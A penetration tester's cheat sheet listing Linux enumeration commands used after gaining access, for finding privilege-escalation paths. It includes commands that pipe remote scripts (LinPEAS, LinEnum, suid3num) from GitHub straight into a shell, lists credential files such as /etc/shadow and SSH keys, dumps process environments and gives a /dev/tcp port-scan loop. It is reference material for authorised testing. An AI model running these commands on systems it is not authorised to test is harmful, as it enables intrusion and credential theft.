#### Enum #### ************ Things to do ************ | Basic enum | https://book.hacktricks.xyz/linux-hardening/privilege-escalation | https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#references .. code-block:: bash # First things to check id # Whoami & groups cat /etc/issue /etc/os-release # OS uname -a # Always check online for CVE cat /etc/passwd # Users cat /etc/fstab # Mount points ps faxwu | cat # Processes tree lscpu # Architecture cat /etc/shells # Available shells cat /etc/group|grep -v ':$' # Group with members getent group sudo # sudo members # System activity lastlog w # System services and installations dpkg -l | cat # Installed packages systemctl --type=service | cat # List services # Network ss -lapunte | cat netstat -ntlp | cat ip a ip route route routel cat /etc/iptables/rules.v4 iptables -L arp -a # Files ls -ltrha / /opt /srv /home/* /root/ ls -ltrha /tmp /var/tmp /dev/shm ls -ltrha /var/www/* find /home/ -type f -printf '%T@ %p\n' | sort -nr | head -20 # Recent files find /home/ -type f -printf '%T@:%TY-%Tm-%Td %TH:%TM %p\n'|sort -n|cut '-d:' -f2- find /home/ -type f -size +0 find /home -type f -size +0 -name ".*" -exec ls -l {} \; 2>/dev/null # Hidden files find /home -type d -name ".*" -ls 2>/dev/null # Hidden dirs sudo -l # if you need TTY : python3 -c 'import pty; pty.spawn("/bin/bash")' find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null # Find all user SUID binaries find / -perm -6000 -exec ls -ldb {} \; 2>/dev/null # Find all group SUID binaries find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \; # Capabilities find / -perm -u=s -type f 2>/dev/null find / -type f \( -user userblabla -o -group userblabla \) -size +0 -exec file {} + 2>/dev/null mount lsblk find / -writable -type d 2>/dev/null cat ~/.bashrc /usr/sbin/getcap -r / 2>/dev/null cat /etc/fstab | grep -v "#" | column -t # Unmounted File Systems # Env by process cd /proc/ ; for i in [0-9]* ; do echo -e "\n## $i $(ps -fp $i 2>/dev/null)" ; cat $i/environ 2>/dev/null | tr '\0' '\n' | strings ; done # Crons ls -lah /etc/cron* crontab -l grep "CRON" /var/log/syslog # App armor status aa-status # Modules lsmod /sbin/modinfo interestingmodule | ******* Scripts ******* LinPEAS ******* .. code-block:: bash curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh LinEnum ******* .. code-block:: bash curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh SUID Enum ********* | Enum SUID program with python2/3 built-in modules | https://github.com/Anon-Exploiter/SUID3NUM .. code-block:: bash curl https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py | python | ************* Watch Process ************* | Watch for existing and new process | https://github.com/DominicBreuker/pspy | ***************** Interesting Files ***************** Public ****** .. code-block:: bash # /etc/issue /etc/passwd /etc/group Root **** .. code-block:: bash # /etc/sudoers /etc/shadow /etc/master.passwd # OpenBSD /var/spool/cron/crontabs/* /var/spool/cron/* User **** .. code-block:: bash # /home/*/.bash_history /home/*/.ssh/* Auditd (adm) ************ When parsing audit logs you may encounter hex encoded data .. code-block:: bash for VAR in cmd data ; do for DATA in $(grep "$VAR=[^\"]" /var/log/audit/audit.log*) ; do echo "$DATA" | sed "s#.*$VAR=\([^ ]*\).*#\1#" | xxd -r -p | tr -dc '[:print:]\t\n' | echo $(cat) done done | ********** Scan Ports ********** | Retrieve hidden ports without scanner/netstat .. code-block:: bash bash -c 'for i in {1..65535};do echo>/dev/tcp/127.0.0.1/$i&&echo OK $i;done' 2>/dev/null | ******** Binaries ******** | When you encounter binaries without knowing what it does you can use strace to list system calls .. code-block:: bash strace binaryname |